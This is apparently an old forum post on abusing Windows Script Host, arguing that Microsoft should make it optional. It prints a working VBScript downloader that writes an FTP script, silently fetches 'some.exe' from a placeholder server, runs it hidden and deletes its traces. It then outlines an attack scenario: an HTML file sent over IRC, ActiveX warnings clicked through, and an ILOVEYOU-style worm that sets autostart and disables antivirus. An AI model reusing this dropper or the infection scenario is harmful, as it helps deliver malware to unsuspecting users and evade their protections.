Lets look at what can you do with some scripting information

=================================================================

Dim fso, MyFile
Set fso = CreateObject("Scripting.FileSystemObject")
Set MyFile= fso.CreateTextFile("sometext.txt", True)
MyFile.WriteLine("username")
MyFile.WriteLine("password")
MyFile.WriteLine("get some.exe")
MyFile.WriteLine("bye")
MyFile.Close

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "ftp -s:sometext.txt someftpserver.com" ,0 ' heeey look at that zero hides ftp process

WshShell.Sleep 6000000 ' lets wait

WshShell.Run "some.exe", 0

fso.DeleteFile("sometext.txt")

==================================================================

[HKEY_CLASSES_ROOT\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32]
@="C:\\WINDOWS\\System32\\vbscript.dll"

Most of the AV softwares changes registry like that

@="C:\\.......\\antivbs.dll"
Defaultdll="C:\\WINDOWS\\System32\\vbscript.dll"

Here is the scenario.
in IRC you've taken DCC file send request of an html file its not an executeable isn't it? Accept.
I know you fed up with the microsoft security warnings just click OK to ActiveX Security warning. ILUVYOU like encoding decodes the worm make registry entries for autostart and block AV interrupt.


What dou you think? I think Microsoft should make Microsoft Scripting Host optional.

PS: VBS Code taken MSDN network and it was calc.exe example.
Skiddy Note: Don't do that!